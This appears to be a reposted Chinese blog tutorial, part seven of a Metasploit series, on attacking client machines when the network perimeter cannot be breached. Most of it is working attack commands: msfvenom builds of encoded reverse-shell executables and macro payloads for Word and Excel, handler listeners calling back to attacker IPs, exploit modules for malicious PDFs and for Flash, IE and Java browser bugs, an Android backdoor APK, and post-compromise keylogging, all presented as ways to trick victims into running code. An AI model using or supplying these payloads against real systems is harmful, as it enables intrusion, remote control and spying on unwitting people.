Metasploit framework(七)——客户端渗透

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

在无法突破网络边界的情况下转而攻击客户端有一些思路,如:
1、社会工程学攻击
2、进而渗透线上业务网络
3、透过含有漏洞利用代码的WEB站点,即:利用客户端漏洞
4、含有漏洞利用代码的DOC、PDF等文档
5、诱骗被害者执行Payload

思路举例:

诱骗被害者执行Payload,先生成可执行程序:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe 

将可执行程序发送到客户端等待客户端运行,同时本地msf侦听开启:

msfconsole -q
use exploit/multi/handler 
set payload windows/shell/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit


含有漏洞利用代码的DOC、PDF等文档,举例:

(PDF阅读器利用下面的客户端程序的漏洞实现攻击)
利用Acrobat Reader漏洞执行Payload
首先构造PDF文件:

exploit/windows/fileformat/adobe_utilprintf 
set payload meterpreter/reverse_tcp
set lhost
set lport
run

被攻击者的电脑的阅读器如果存在漏洞,那么将被执行成功取得shell。
扩展:当取得meterpreter后,可以执行例如以下命令对目标的控制:

use priv 
run post/windows/capture/keylog_recorder (知道对方正在敲击的键盘)


利用Flash插件漏洞执行payload(要对应相同的版本)
 

扫描二维码关注公众号,回复: 9128519 查看本文章
use exploit/multi/browser/adobe_flash_hacking_team_uaf 
use exploit/multi/browser/adobe_flash_opaque_background_uaf 


利用IE浏览器漏洞执行payload

use exploit/windows/browser/ms14_064_ole_code_execution


利用JRE漏洞执行payload
 

use exploit/multi/browser/java_jre17_driver_manager 
use exploit/multi/browser/java_jre17_jmxbean 
use exploit/multi/browser/java_jre17_reflection_types 


生成Android后门程序

use payload/android/meterpreter/reverse_tcp 
generate -f a.apk -p android -t raw

VBScript感染方式:
利用宏感染word、Excel文档,从而绕过某些基于文件类型检查的安全机制
先生成VBScript脚本:

msfvenom -a x86 --platform windows -p windows/ meterpreter/reverse_tcp LHOST=172.20.10.11 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe 

再在文档中添加生成的payload:
:视图---->宏---->创建
    payload第一部分粘入VBA代码;
    payload第二部分(data)粘入word文档正文;
最后Msf启动侦听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp

只要被攻击者点击文档,那么就能够取得shell。


 

发布了36 篇原创文章 · 获赞 16 · 访问量 2万+

猜你喜欢

转载自blog.csdn.net/Jack0610/article/details/88916562
今日推荐